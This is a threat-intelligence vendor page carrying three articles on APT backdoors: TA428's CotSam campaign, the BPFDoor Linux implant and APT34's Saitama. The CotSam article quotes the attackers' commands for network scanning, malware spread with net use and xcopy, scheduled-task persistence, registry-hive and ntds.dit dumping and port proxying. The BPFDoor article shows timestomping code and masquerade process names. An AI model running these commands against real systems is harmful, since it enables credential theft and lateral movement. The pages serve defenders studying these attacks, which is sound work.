loading..

Product

Our Product

We are Reshaping the way companies find and fix critical vulnerabilities before they can be exploited.

loading..

Threatspy

Solutions

By Industry

Health Care

Education

IT & Telecom

By Role

Government

CISO/CTO

DevSecops

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

loading..

Threat Feeds

loading..

Threat Research

loading..

White Paper

loading..

SB Blogs

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..

Our Story

loading..

Our Team

loading..

Careers

Press & Media

loading..

Contact Us
loading..
loading..

Join the waitlist

loading..

By submitting this form, you agree to our Subscription Agreement and Legal Policies.

background
background
loading..
loading..
loading..
Loading...

APT

loading..
loading..
loading..

ToddyCat APT targeting high profile cyberespionage across Europe & Asia

A new APT group, tracked as ToddyCat, to a series of attacks targeting entities in Europe and Asia since at least December 2020...

loading..
  25-Jun-2022
loading..
 7 min read

Related Articles

loading..

APT

Backdoor

TA428

CotSam: a never seen before malware strain involved in the targeted attacks acro...

In the course of our threat research, we have discovered a new backdoor that differs from every other one utilized in assaults that researchers have linked to TA428. We chose to call the malware Backdoor because of its resemblance to the Cotx backdoor. Win32.team. The attackers employed two techniques for simultaneously deploying the malware while building the attack. In the first instance, the malware was sent along with a weak version of Microsoft Word. For 32-bit computers, Microsoft Word 2007 was employed, and for 64-bit platforms, Microsoft Word 2010. Following launching WINWORD.EXE, a DLL hijacking vulnerability was used to gain control and send it to the malicious library wwlib.dll, which used a straightforward xor operation and the key 0xAA to decrypt the file OEMPRINT.CAT from the current directory. ![TR1.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_1_e97461df8e.jpg) The executable file that has been decrypted is then directly written to the memory of the svchost.exe process using the WriteProcessMemory method. In the second instance, the attackers took advantage of the applaunch.exe program's DLL hijacking vulnerability (`MD5: 170D73BE3FE846E9070CFAE530F5A31C`). It's important to note that other Chinese organizations had previously disseminated ShadowPad malware using the identical version of applaunch.exe. The backdoor connects to the CnC server and waits for commands after extracting the proxy server's parameters from the registry value `HKCUSoftwareMicrosoftWindowsCurrentVersionInternet SettingsProxyServer.` ### LATERAL MOVEMENT The attackers attempt to distribute the malware to further computers connected to the workplace network after taking control of the initial system. The attacker's current goal is to get access to the domain controller and take complete control of the infrastructure of the company being attacked. Attackers exploit a remote shell supplied by backdoor malware to launch their tools and retrieve operation results. In the course of our investigation, we discovered a number of hand-entered commands that the attackers used to execute a set of commands on infected systems (this is indicated both by the time intervals between orders and by the output of results not being redirected anywhere except standard output). Majority of the attacks were performed using the NBTscan console tool, which was downloaded to victims' PCs as a.cab archive called ace.cab and unpacked using the expand system tool: `expand.exe ace.cab ace.exe` `ace -n 172.22.0.0/16` We also saw the employment of the Ladon hacking framework in a few instances. The framework is made up of a variety of modules with various lateral movement functionality, such as: - Scanning the network and finding different types of devices. - Identifying and exploiting vulnerabilities in the devices found. - Cracking passwords for resources on the network. - Scanning for password hashes. - Scanning for passwords in text files. - Remotely executing arbitrary code. ![TR2.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_2_6ec25456fe.jpg) While these tools are getting heavily leveraged by attackers, they are empowered to scan the whole network architecture and discover the systems most exposed to attack. Additionally, the hackers gathered data about system users and their network connections. They were particularly interested in RDP connections: `query user` `net user` `net group` `ipconfig /all` `netstat -no` `netstat -no | findstr 3389` `netstat -ano | findstr 2589` ### Distribution of Malware Using the results of network scanning and user credentials that they had already obtained, the attackers were able to spread their infection from one system to the next. They utilized the net use and xcopy programs to connect to distant systems and install malware on those systems: `net use \\[IP address]\IPC$ "[password]" /u:"[user name]"` `xcopy.exe /s \\[IP address]\c$\windows\web\*" $windir\Web\ /y /e /i /q` An open-source VBS script called wmic.vbs was occasionally used to deliver malware, and the attackers also downloaded it to remote systems: `cscript.exe //nologo wmic.vbs /cmd [IP address] [user name][password] $appdata\ABBYY\Install.exe` Although the VBS script was initially created as a penetration testing tool, threat actors frequently employ it in actual attacks. Using WMIC, the script wmic.vbs performs commands for a user account with administrative rights (Windows Management Instrumentation Command-line). Here Windows Task Scheduler is used by attackers to create task in other instances to ensure that the virus launched automatically: `schtasks /create /tn CacheTasks /tr “$appdata\ABBYY\FineReader\WINWORD.EXE” /sc minute /mo 50 /ru “” /f` Attackers who were able to access closed networks—networks not directly connected to the internet—turned intermediate systems—systems accessible from closed networks while also being connected to the internet—into proxy servers in those situations. This made it possible for malware to communicate with its CnC servers while running on computers connected to closed networks. In this scenario, configuring network traffic redirection was a simple process that could be completed with the use of built-in Windows tools: `netsh interface portproxy add v4tov4 2589 <IP address> 443` ### Domain Hijacking The attackers took the whole database of Active Directory user password hashes after taking control of the domain controller. To do this, they first used a unique cmd command to store a copy of the system registry hives: `reg save HKLM\SAM sam.save` `reg save HKLM\SECURITY security.save` Following that, they copied the ntds.dit file, which houses the Active Directory database and user password hashes. Curiously, the system constantly uses the file ntds.dit and prevents ordinary copying tools from working on it. The attackers circumvented this restriction by employing a specific tool made to copy the file via the Windows volume shadow copy service (VSS). ![TR3.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/TR_3_2456e3d8ab.jpg) An example of a command launching the utility is shown below: `c:\programdata\microsoft\sc64.exe c:\windows\ntds\ntds.dit` `c:\programdata\microsoft\ntds.dit` The attackers acquired logins and password hashes for each user on the domain by using the system registry's contents and the file ntds.dit. In order to obtain the login credentials for the majority of users from the domain of the attacked company, the attackers next utilized hash cracking. In circumstances where an attacked organization's IT architecture had many domains, the attackers examined trust relationships between the domains to locate accounts that allowed them to migrate laterally: `nltest /domain_trusts` Attackers gained access to a domain controller and, among other things, the password hash for the user krbtgt (an Active Directory service account), allowing them to launch the Golden Ticket attack. For an unlimited period of time, it permitted them to independently issue Kerberos tickets (TGT) and perform authentication on any Active Directory service. The security team of the attacked firm in one of the cases examined unusual activity on the domain controller, and as a result, changed the passwords of users whose accounts had been compromised. However, the attackers proceeded to use Kerberos tickets to act without incident on behalf of these accounts. This demonstrates that traditional incident response techniques are ineffective in the event of a Golden Ticket attack. Last but not least, it's important to remember that in one of the incidents, the attackers were also successful in gaining access to the server hosting the system that regulates security solutions and remotely changing the settings of the endpoint security products the company was using. Our findings derived from this [threat research](https://www.secureblink.com/threat-research) demonstrates that spear phishing is still one of the most important risks to commercial companies and government institutions. The majority of the malware employed by the attackers has known backdoor software, along with common lateral movement strategies and antivirus solution evasion techniques. They could access dozens of businesses simultaneously and even take over the complete IT infrastructure, IT security measures, and some of the targeted firms. Assault series we have identified is not the first in the campaign, and given the attackers' level of success, we think it is quite probable that they will carry out other attacks along these lines in the future. Public and private organizations should implement comprehensive efforts to deter such attacks evident across cyberspace.

loading..
  09-Aug-2022
loading..
  1 min read
loading..

Malware

Backdoor

Linux

BPFDoor is a Linux/Unix backdoor that allows threat actors to remotely connect t...

BPFdoor, a Linux-based backdoor malware that surfaced in an evasive mode, has been stealthily targeting Linux and Solaris systems stealthily for more than five years. It enables threat actors to remotely connect to a Linux shell to obtain complete access to compromised devices without opening any new network ports or firewall rules. Kevin Beaumont uncovered this Linux-specific backdoor related to Chinese Red Menshen threat actors, but its source was posted [anonymously](https://pastebin.com/kmmJuuQP). In his [blog](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896), he elaborately discloses that this backdoor has been operational worldwide for many years, with perhaps tens of thousands of cases. While the malware doesn't require any open ports, it can’t be stopped by firewalls. It can respond to commands from any IP address on the web, making it the ideal tool for corporate cyberespionage and persistent attacks. ## Compatibility The BPFDoor source is concise, targeted, and well-written. While the sample we reviewed was Linux-specific, it could be easily ported to other platforms with a few minor modifications (a Solaris binary reportedly exists). BPF is generally available across multiple operating systems, and the core-shell functionalities are expected to function on multiple platforms with minimal change. The dynamically linked binary is small at about 35K on Ubuntu: `-rwxr-xr-x 1 root root 34952 May 11 00:03 bpfdoor` It would grow to approximately 1 MB if statically linked, but the dynamically linked version would likely work on most modern Linux distributions. Cross-compilation for several CPUs is also possible; therefore, this implant is expected to be compatible with embedded Linux systems. ## Persistence The implant itself lacks persistence mechanisms because it is extremely specialized for a specific function. Persistence must be initiated by the attacker in some other method, such as via rc or init scripts or crontab-scheduled activities. The initial report mentioned previously indicates the discovery of persistence scripts. On Linux, the implant uses /dev/shm. This is a ramdisk, and its contents are erased with each reboot. To survive reboots, the implant must reside elsewhere on the host or be reinserted remotely for persistence considerations. When incident response teams discover this implant in operation, they should assume that the actual malware is located somewhere on the file system. Assess all system boot scripts for unusual references to binaries or paths. ## Timestomping The binary clones itself to /dev/shm/kdmtmpflush, which only exists in RAM and is wiped with each reboot. The unique factor of the implant is that it sets a fake time to timestomp the binary before deletion. `tv[0].tv_sec = 1225394236;` `tv[0].tv_usec = 0;` `tv[1].tv_sec = 1225394236;` `tv[1].tv_usec = 0;` `utimes(file, tv);` ## PID Dropper The implant generates a PID file with zero bytes at /var/run/haldrund.pid. This file is removed if the implant finishes normally, but it may be left behind in the event of a hard shutdown or crash. If this file is present, the implant will not start, as it is used to indicate that it may already be running. ## Binary Deletion The binary deletes itself after it starts, making a recovery more difficult. However, restoring a deleted process binary on Linux is simple once the system is operational (see our article on how to do it). The primary effect of deletion, however, is to shield the binary from detection by malware scanners that rely on file scanning. If the primary binary is hidden/encrypted on the device for persistence, it would be challenging to locate the binary. On Linux, however, a removed process binary is highly suspect. If you search for any process that contains a deleted binary, the following as highlighted: `ls -alR /proc/*/exe 2> /dev/null | grep deleted` ## Masquerading Tactics `/sbin/udevd -d` `/sbin/mingetty /dev/tty7` `/usr/sbin/console-kit-daemon --no-daemon` `hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event` `dbus-daemon --system` `hald-runner` `pickup -l -t fifo -u` `avahi-daemon: chroot helper` `/sbin/auditd -n` `/usr/lib/systemd/systemd-journald` The names are designed to resemble typical Linux system daemons. The implant overwrites the Linux /proc filesystem's argv[0] value, which is used to decide the command line and command name to display for each process. By doing so, when you execute commands such as ps, the fictitious name will be displayed. The process executing under the alias dbus-daemon —system is displayed below. ![Bpfdoor ps listing.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Bpfdoor_ps_listing_f8aab890fd.jpg) This masquerade tactic has existed for some time. While it functions, the true process name is still visible within Sandfly, along with the masked versions. A discrepancy of this nature between the actual process name and the command line values also suggests a problem. Tristan Pourcelot of the [threat intelligence](https://exatrack.com/public/Tricephalic_Hellkeeper.pdf) and incident response company [Exatrack](https://exatrack.com/) noted in a technical examination of BPFDoor that the virus has multiple hard coded names that match command strings within relevant packets: - Justtryit, Justrobot, and Justforfun to establish a bind shell on ports 42391 through 42491 - Socket or socket TCP establishes a reverse shot to an IP address in the packet. BPFDoor's strategies for evading detection include renaming the binary so that it seems to be a typical Linux daemon. ## Bindshell Backdoor Bypassing Firewall The malware employs a Berkeley Packet Filter (the BPF in the name of the backdoor) sniffer that operates at the network layer interface, allowing it to monitor all network activity and transmit packets to any destination. Due to its placement at such a low level, BPF does not adhere to any firewall regulations. It is available for Linux and Solaris SPARC platforms and might also be adapted to BSD. In addition, the operators utilize a "magical" password to regulate the actions of the implant. BPFDoor only parses ICMP, UDP, and TCP packets, examining them for a particular data value and a password for UDP and TCP packets. BPFDoor is distinguished because it can monitor any port for the magic packet, even if those ports are utilized by legitimate services such as webservers, FTP, or SSH. If the TCP and UDP packets include the correct "magic" data and a valid password, the backdoor activates and executes a supported command, such as establishing a bind or reverse shell. ![Firewall redirect diagram.jpg](https://sb-cms.s3.ap-south-1.amazonaws.com/Firewall_redirect_diagram_8fd755fffb.jpg) Researchers were able to identify BPFDoor activity on the networks of companies in several regions, including the United States, South Korea, Hong Kong, Turkey, India, Vietnam, and Myanmar. 11 Speedtest servers were surprisingly infected with BPFDoor. It is unknown, according to the researcher, how these devices were infiltrated, given that they operate on closed-source software. ## Conclusive Finding Leveraging techniques like environment anti-forensics, timestomping, and process masquerade, this implant is well-executed. The combination of BPF and packet capture allows remote attackers to manipulate the implant by circumventing local firewalls. Lastly, the redirect capability is unique and extremely hazardous because it can blend malicious and legitimate traffic on an infected host with exposed ports. The code does not reveal much about its writers, but an expert definitely wrote it to evade detection.

loading..
  31-May-2022
loading..
  1 min read
loading..

Phishing

Backdoor

FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat act...

A new stealthy backdoor known as Saitama has been discovered in a spear-phishing attempt targeting Jordan's foreign ministry. Malwarebytes and Fortinet FortiGuard Labs researchers connected the attack to an Iranian cyber espionage threat actor known as APT34, citing similarities to previous campaigns launched by the outfit. The email, like many of these assaults, contained a malicious attachment, according to Fortinet researcher Fred Gutierrez. "The associated danger, however, was not your typical virus. Instead, it possessed advanced persistent threat (APT) capabilities and methodologies." APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, has been active in the Middle East and North Africa (MENA) since at least 2014 and has a history of targeting the telecom, government, defense, oil, and banking sectors with targeted phishing assaults. ESET linked the group to a long-running information gathering operation targeting diplomatic institutions, technological corporations, and medical groups in Israel, Tunisia, and the United Arab Emirates earlier this February. Backdoor in Saitama The newly discovered phishing mail includes a weaponized Microsoft Excel sheet, which when opened urges the potential victim to activate macros, allowing a malicious Visual Basic Application (VBA) macro to drop the malware payload ("update.exe"). In addition, the macro provides implant permanence by including a scheduled job that runs every four hours. Saitama is a.NET-based malware that uses the DNS protocol to conceal its command-and-control (C2) connections while executing commands received from a C2 server using a "finite-state machine" technique. CyberSecurity "This suggests this virus is getting tasks from a DNS response," Gutierrez stated. DNS tunneling, as the name implies, allows other programs or protocols' data to be encoded in DNS queries and answers. The command execution results are then transmitted back to the C2 server, along with the exfiltrated data embedded in a DNS request. "Given the amount of effort put into constructing this virus, it does not appear to be the sort to execute once and then destroy itself," Gutierrez added. "This virus does not build any persistence mechanisms, maybe to avoid triggering any behavioral detections. Instead, a scheduled process is used to generate persistence using an Excel macro."

loading..
  13-May-2022
loading..
  1 min read